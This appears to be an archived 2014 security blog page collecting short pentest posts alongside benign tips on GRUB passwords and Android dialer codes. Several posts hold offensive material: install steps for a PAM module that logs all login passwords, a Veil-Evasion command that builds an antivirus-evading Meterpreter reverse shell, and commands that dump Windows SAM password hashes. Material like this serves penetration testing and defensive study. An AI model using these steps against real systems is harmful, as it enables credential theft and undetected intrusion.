Jul 19, 2014

Tools: PAM_steal - Monitoring password PAM

Typically pentest’s attack can be presented by the following schema:

perimeter -> command execution -> privileges escalation -> ...
The next step for pentesters is to gain privileges at other machines.
For example, it can be done by stealing credentials (one of many methods).
Passwords at local machine will be hashed and it's not so good to crack it due to the time.

SSH MITM (tool: http://www.signedness.org/tools/mitm-ssh.tgz) is a good one. It should be noticed though that passwords can be shared between many services and thus is also necessary.

PAM (Pluggable Authentification Module) provide dynamic authorization for applications and services in a Linux system. Our password logger plugin for PAM can be found here: https://github.com/ONsec-Lab/scripts/tree/master/pam_steal

This is a good point after rooting machines during penetration tests.

Install process:
vim /etc/pam.d/common-auth
add "auth required pam_steal.so" into it
Then check /tmp/.steal.log - all FTP/SSH and other PAM-based daemon's passwords will be there!

Source: http://lab.onsec.ru/2014/07/pamsteal-plugin-released.html

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: OSUETA - A simple Python script to exploit the OpenSSH User Enumeration Timing Attack

OSUETA stands for OpenSSH User Enumeration Timing Attack and is a small script written in Python to exploit a bug present in versions 5 . * and 6. * of OpenSSH . In these versions during the authentication process, you may obtain a list of users in the system discriminated by the time it takes the system to evaluate an arbitrarily long password.

If the user is present, the time it takes the server to respond is larger. For example, to allow users found present in a system , this tool can be useful in penetration testing to shorten in brute force. The script also has the ability to establish a Denial of Service attack in the ssh service.

Source: https://github.com/c0r3dump3d/osueta

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Jul 17, 2014

Howto: Password Protection for Grub Bootloader in Ubuntu 14.04

1. Generate password with grub-mkpasswd-pbkdf2 command
2. Edit /etc/grub.d/00_header. Add these line to bottom of file.
#### For protect grub boot loader
cat << EOF
set superusers="youruser"
password_pbkdf2 youruser  <your_password_that_got_from_step#1>


3.  Edit /etc/grub.d/10_linux, in line 117. Add "--users youruser" between "with Linux" and "os" such as
title="$(gettext_printf "%s, with Linux %s (%s)" --users adminlocal "${os}" "${version}" "$(gettext "${GRUB_RECOVERY_TITLE}")")" ;;

4. Run command with grub-mkconfig
# grub-mkconfig -o /boot/grub/grub.cfg

5. Done

** if you want to not ask in normal boot loader, add "--unrestricted" into boot entry. Such as
menuentry 'Ubuntu' --class ubuntu --class gnu-linux --class gnu --class os $menuentry_id_option 'gnulinux-simple-d7a144cb-230e-4134-888e-a6e5840e26d0' --unrestricted

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Jul 14, 2014

Howto: Bypassing AV with Veil-Evasion

Full article:: https://www.netspi.com/blog/entryid/234/bypassing-av-with-veil-evasion

There are a couple of built in encoders in Metasploit (shikata ga nai is the most popular one), but these signatures have been updated in many Antivirus solutions, resulting in detection.
Veil-Evasion, This tool comes with thirty different payloads in C, C#, PowerShell, and Python languages.
Python versions, simply because it was the only language in Veil-Evasion that supported Meterpreter reverse HTTPS connections (until recently). This is beneficial for shells because everything will be encrypted with SSL, preventing the commands and results from being transmitted in the clear and potentially being discovered by an IDS or IPS system. Another benefit of using Python is the ability to make contained payloads. This means that all the Meterpreter code needed for the reverse https connection is already included instead of only being a stager that downloads the rest of the code to run.
Veil-Evasion also has command line switches that allow for easy scripting. This makes it dead simple to generate dynamic Veil-encoded Meterpreter payloads. Below is an example of a python reverse_https_contained Meterpreter executable using pyherion encoding being generated through the command line:

/root/tools/Github/Veil/Veil-Evasion/Veil-Evasion.py -p python/meterpreter/rev_https_contained -c LHOST= LPORT=443 use_pyherion=Y --overwrite -o malicious

Jul 13, 2014

Howto: Get your public IP from Command Prompt

nslookup myip.opendns.com resolver1.opendns.com
After that review it with http://www.iplocation.net/

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: RIPS - static source code analyser for PHP

RIPS is a static source code analyser for vulnerabilities in PHP webapplications. It was released during the Month of PHP Security (www.php-security.org).
NOTE: RIPS 0.5 development is abandoned. A complete rewrite is in development and used as an academic prototype but not publicly available yet.

Source: http://sourceforge.net/projects/rips-scanner/

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Secret Information of Android Phone

1. Complete Information About your Phone

Dial this number/code: *#*#4636#*#*

It gives you information about your phone and battery including,

- Phone information
- Battery information
- Battery history
- Usage statistics

2. Factory data reset

The following number/code will be used: *#*#7780#*#*

Dialing this code will give you a prompt that will have the 'Reset phone' button. If you don't want to reset, then press cancel. If you choose to reser then the following data is removed,

- Google account settings
- System and application data and settings
- Downloaded applications

The following data is not removed:

- Current system software and bundled application
- Files on your SD card, like photos, music etc.

3. Format Android Phone

Number/code: *2767*3855#

This code formats your Android device, so do it only if absolutely necessary. The code is used in order to perform a factory format on your device and removes all settings and files, including the internal memory storage. It reinstall's the phone's firmware and there is no way to cancel this operation, except removing the battery from the device.

4. Phone Camera Update

Number/code: *#*#34971539#*#*

This code will give you information about the camera on your phone. The following four menus are shown,

- Update camera firmware in image
- Update camera firmware in SD card
- Camera firmware version
- Firmware update count

Using the 'Update camera firmware in image' option has been known to make your camera stop working, so it is advisable to not choose that option.

5. End Call/Power

Number/code: *#*#7594#*#*

This code allows you to manipulate the function of the power on/off/lock button on your smartphone. Instead of getting the options for silent mode etc. you can choose to make it turn off the power directly.

6. File Copy for Creating Backup

Number/code: *#*#273283*255*663282*#*#*

This is a very useful code that lets you backup your images, media files, video, voice memo etc. You will get a file copy screen allowing you to backup images.

7. Service Mode

Number/code: *#*#197328640#*#*

The idea behind entering the Service Mode is that you can run various tests on your device using this.

8. WLAN, GPS and Bluetooth Test Codes:

There are various codes that you can use for this one.

- *#*#232338#*#* - Shows WiFi MAC Address

- *#*#1472365#*#* - GPS Test

- *#*#1575#*#* - Another GPS Test

- *#*#232331#*#* - Bluetooth Test

- *#*#232337#*# - Shows Bluetooth Device Address

9. Codes to get Firmware version information:

The following codes provide the firmware information about your device.

- *#*#4986*2650468#*#* - PDA, Phone, H/W, RFCallDate

- *#*#1234#*#* - PDA and Phone

- *#*#1111#*#* - FTA SW Version

- *#*#2222#*#* - FTA HW Version

- *#*#44336#*#* - PDA, Phone, CSC, Build Time, Changelist number

10. Codes to launch various Factory Tests:

There are various other factory tests that you can run on a smartphone.

- *#*#0283#*#* - Packet Loopback

- *#*#0*#*#* - LCD test

- *#*#0673#*#* OR *#*#0289#*#* - Melody test

- *#*#0842#*#* - Device test (Vibration test and BackLight test)

- *#*#2663#*#* - Touch screen version

- *#*#2664#*#* - Touch screen test

- *#*#0588#*#* - Proximity sensor test

- *#*#3264#*#* - RAM version  

Source: http://www.efytimes.com/e1/fullnews.asp?edid=140681&magid=11

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: Dump Windows password hashes efficiently

The Security Accounts Manager (SAM) is a registry file in Windows NT and later versions until the most recent Windows 7. It stores users' passwords in a hashed format (in LM hash and NTLM hash). Since a hash function is one-way, this provides some measure of security for the storage of the passwords.

Two widely known tools to dump the local users' hashes from the SAM file, given the Windows file system block file, are bkhive and samdump2:
  • bkhive - dumps the syskey bootkey from a Windows system hive.
  • samdump2 - dumps Windows 2k/NT/XP/Vista password hashes.
Example of retrieving the SAM hashes from a Windows partition /dev/sda1:
# mkdir -p /mnt/sda1
# mount /dev/sda1 /mnt/sda1
# bkhive /mnt/sda1/Windows/System32/config/SYSTEM /tmp/saved-syskey.txt
# samdump2 /mnt/sda1/Windows/System32/config/SAM /tmp/saved-syskey.txt > /tmp/hashes.txt
In the event that you have not got bkhive or samdump2 with you, you can fall-back to copy the SYSTEM and SAM files from /mnt/sda1/Windows/System32/config to your USB stick and import them to any tool that is able to extract the SAM hashes from them: Cain & Abel, creddump and mimikatz are some available tools.
Bypass login prompt

If you are looking into bypassing the login prompt rather than dumping users' password hashes, some smart people have came up with innovative approaches:
  • BootRoot is a project presented at Black Hat USA 2005 by researchers Derek Soeder and Ryan Permeh, as an exploration of technology that custom boot sector code can use to subvert the Windows kernel as it loads. The eEye BootRootKit is a boot sector-based NDIS backdoor that demonstrates the implementation of this technology.
  • SysRQ2 is a bootable CD image that allows a user to open a fully privileged (SYSTEM) command prompt on Windows 2000, Windows XP, and Windows Server 2003 systems by pressing Ctrl+Shift+SysRq at any time after startup. It was first demonstrated at Black Hat USA 2005 by researchers Derek Soeder and Ryan Permeh as an example of applied eEye BootRoot technology. Use the "create CD from ISO image" feature of your preferred CD burning software to create a bootable SysRq CD.
  • Kon-Boot is an prototype piece of software which allows to change contents of a linux kernel and Windows kernel on the fly (while booting). In the current compilation state it allows to log into a linux system as root user without typing the correct password or to elevate privileges from current user to root. For Windows systems it allows to enter any password protected profile without any knowledge of the password.
Password reset

Alternatively you can boot the machine with the bootdisk live CD or USB stick and use the chntpw utility to reset any Windows local user's credentials.
The typical scenario here is that you have compromised a Windows machine by any means and have got shell access as an administrative user. Firstly, you need to escalate your privileges to SYSTEM user. A simple way is to use Sysinternals' PsExec utility:
C:\>psexec.exe -i -s cmd.exe
Although, there are several other techniques too, but this is outside of the scope of this post.
Another solution is to use regback.exe part of the Windows 2000 Resource Kit Tools. This is slightly easier as it only dumps the specific files:
C:\>regback.exe C:\backtemp\SAM machine sam
C:\>regback.exe C:\backtemp\SYSTEM machine system
If you cannot get regback.exe to work, on Windows XP and above systems use regedit.exe or reg.exeUsing reg.exe:
C:\>reg.exe save HKLM\SAM sam
The operation completed successfully
C:\>reg.exe save HKLM\SYSTEM sys
The operation completed successfully
Using regedit.exe:
  • Execute regedit.exe from Start / Run prompt.
  • Open up Computer\HKEY_LOCAL_MACHINE and right-click the SAM section and select Export.
  • Change the Save as type setting to Registry Hive Files and save as SAM.
  • Same steps with SYSTEM hive.
Lastly, you can also get the SAM and SYSTEM files from C:\Windows\repair\. Although this directory contains outdated copies of the original C:\Windows\System32\config\ files so it might not reflect the current users' credentials.

The Metasploit Framework also has its own post-exploitation modules, Meterpreter built-in command and dated Meterpreter script to dump the SAM hashes. Details on how these pieces of code work within the framework and which techniques they implement can be found on these blog posts by HD Moore.

Needless to say that there are more options and knowledge of which one to use within the target environment is important. In order to facilitate this task, I have listed the relevant tools, their capabilities, where they do work and, most importantly, where they are known to fail on this spread-sheet.

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: zer0m0n - driver for cuckoo sandbox

zer0m0n is a driver for Cuckoo Sandbox, it will perform kernel analysis during the execution of a malware. There are many ways for a malware author to bypass Cuckoo detection, he can detect the hooks, hardcodes the Nt* functions to avoid the hooks, detect the virtual machine... The goal of this driver is to offer the possibility for the user to choose between the classical userland analysis or a kernel analysis, which will be harder to detect or bypass.
Actually, it works for XP 32 bit and 7 32 bit/64 bit Windows machines.

Source:  https://github.com/conix-security/zer0m0n/

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.